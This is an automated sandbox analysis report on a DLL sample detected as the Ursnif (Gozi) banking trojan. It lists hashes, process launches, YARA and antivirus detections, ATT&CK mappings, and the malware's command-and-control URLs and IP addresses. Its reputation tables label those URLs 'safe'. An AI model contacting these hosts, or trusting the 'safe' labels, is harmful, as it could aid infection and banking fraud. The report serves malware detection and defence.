Play interactive tour

Edit tour

Analysis Report OgQJzDbLce.dll

Overview

General Information

Sample Name:	OgQJzDbLce.dll
Analysis ID:	338189
MD5:	5268c190b3a6940bc7c8f0361f3a187f
SHA1:	56b1b5066f88e07f494e5e97f9a8b791cc9d7bd2
SHA256:	8e34c697b603788b9baeecfb375c466cb8468a322d6ae9b81fc41fb61472c3da
Tags:	dllGozi
Most interesting Screenshot:

Detection

Ursnif

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Creates a COM Internet Explorer object

Writes or reads registry keys via WMI

Writes registry values via WMI

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Creates a DirectInput object (often for capturing keystrokes)

Detected potential crypto function

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6140 cmdline: loaddll32.exe 'C:\Users\user\Desktop\OgQJzDbLce.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)

iexplore.exe (PID: 6572 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6832 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6572 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6392 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4632 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6392 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 3480 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6284 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3480 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6128 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6708 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6128 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.777109164.0000000003AD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.776993803.0000000003AD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.777131098.0000000003AD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.777071428.0000000003AD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.777173919.0000000003AD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.777044888.0000000003AD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.777196001.0000000003AD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.777154030.0000000003AD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 6140	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 4 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: OgQJzDbLce.dll

Virustotal: Detection: 21%

Perma Link

Source: 0.2.loaddll32.exe.10000000.3.unpack

Avira: Label: TR/Crypt.XPACK.Gen8

Source: OgQJzDbLce.dll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Networking:

Creates a COM Internet Explorer object

Show sources

Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior

Source: global traffic	HTTP traffic detected: GET /images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/pPJJGC5mrcZE6ZGUWjS/LKs0W_2FZrtLgELoKDEbZR/8X1_2FxjVbkZk/tVcM_2Bd/jQmX3NhgeWRqCDsfD_2BayQ/lSPwdIYz4P/81sFvcaWcXolUgVkt/y_2B1p3Gvpg_/2F0X2_2F87o/JZseyqJj/p.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: begoventa.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: begoventa.topConnection: Keep-Alive

Source: msapplication.xml0.13.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x33a394ee,0x01d6e846</date><accdate>0x33a394ee,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.13.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x33a394ee,0x01d6e846</date><accdate>0x33a394ee,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.13.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.13.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.13.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.13.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: babidone.top

Source: ~DFD4CA446EF33C2D57.TMP.20.dr, {77F8D092-5439-11EB-90EB-ECF4BBEA1588}.dat.20.dr	String found in binary or memory: http://babidone.top/images/PPpwiauX_2BIh4oFWqX/Djwkz7R93cFnDrrKCEfupn/1lc9UumTDGjRL/5auxQAs_/2B38Hwp
Source: loaddll32.exe, 00000000.00000002.1018176446.0000000001C10000.00000002.00000001.sdmp	String found in binary or memory: http://begoventa.top/images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/p
Source: loaddll32.exe, 00000000.00000002.1018085048.0000000001697000.00000004.00000020.sdmp, ~DF4EBD4894B35EDD90.TMP.25.dr, {9B722639-5439-11EB-90EB-ECF4BBEA1588}.dat.25.dr	String found in binary or memory: http://begoventa.top/images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/pPJJGC
Source: OgQJzDbLce.dll	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: OgQJzDbLce.dll	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: OgQJzDbLce.dll	String found in binary or memory: http://ocsp.sectigo.com0
Source: msapplication.xml.13.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.13.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.13.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.13.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.13.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.13.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.13.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.13.dr	String found in binary or memory: http://www.youtube.com/
Source: OgQJzDbLce.dll	String found in binary or memory: https://sectigo.com/CPS0D

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.777109164.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.776993803.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777131098.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777071428.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777173919.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777044888.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777196001.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777154030.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6140, type: MEMORY

Source: loaddll32.exe, 00000000.00000002.1018072348.000000000168B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.777109164.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.776993803.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777131098.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777071428.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777173919.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777044888.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777196001.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777154030.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6140, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001812 NtMapViewOfSection,	0_2_10001812
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001DD0 GetProcAddress,NtCreateSection,memset,	0_2_10001DD0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100022E5 NtQueryVirtualMemory,	0_2_100022E5

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_100020C4

0_2_100020C4

Source: OgQJzDbLce.dll

Static PE information: invalid certificate

Source: OgQJzDbLce.dll

Binary or memory string: OriginalFilenamewmprph.exej% vs OgQJzDbLce.dll

Source: OgQJzDbLce.dll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED

Source: classification engine

Classification label: mal68.bank.troj.winDLL@13/44@3/3

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5E3D54B5-5439-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFF6F6BADDE9A18747.TMP

Jump to behavior

Source: OgQJzDbLce.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: OgQJzDbLce.dll

Virustotal: Detection: 21%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\OgQJzDbLce.dll'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6572 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6392 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3480 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6128 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6572 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6392 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3480 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6128 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: OgQJzDbLce.dll

Static PE information: section name: .data2

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100020B3 push ecx; ret		0_2_100020C3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002060 push ecx; ret		0_2_10002069

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.777109164.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.776993803.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777131098.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777071428.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777173919.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777044888.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777196001.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777154030.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6140, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Memory protected: page execute read | page guard

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.1018176446.0000000001C10000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.1018176446.0000000001C10000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.1018176446.0000000001C10000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.1018176446.0000000001C10000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_100019C7 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

0_2_100019C7

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001799 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_10001799

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.777109164.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.776993803.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777131098.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777071428.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777173919.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777044888.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777196001.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777154030.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6140, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.777109164.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.776993803.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777131098.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777071428.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777173919.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777044888.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777196001.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.777154030.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6140, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection2	Masquerading1	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Query Registry1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection2	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	File and Directory Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	System Information Discovery3	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
OgQJzDbLce.dll	22%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.loaddll32.exe.10000000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen8		Download File
0.2.loaddll32.exe.15b0000.0.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

Source	Detection	Scanner	Label	Link
begoventa.top	2%	Virustotal		Browse
babidone.top	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://babidone.top/images/PPpwiauX_2BIh4oFWqX/Djwkz7R93cFnDrrKCEfupn/1lc9UumTDGjRL/5auxQAs_/2B38Hwp	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://begoventa.top/images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/p	0%	Avira URL Cloud	safe
http://begoventa.top/favicon.ico	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://begoventa.top/images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/pPJJGC5mrcZE6ZGUWjS/LKs0W_2FZrtLgELoKDEbZR/8X1_2FxjVbkZk/tVcM_2Bd/jQmX3NhgeWRqCDsfD_2BayQ/lSPwdIYz4P/81sFvcaWcXolUgVkt/y_2B1p3Gvpg_/2F0X2_2F87o/JZseyqJj/p.avi	0%	Avira URL Cloud	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://begoventa.top/images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/pPJJGC	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
begoventa.top	92.38.132.181	true	false	2%, Virustotal, Browse	unknown
babidone.top	193.56.255.166	true	false	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://begoventa.top/favicon.ico	false	Avira URL Cloud: safe	unknown
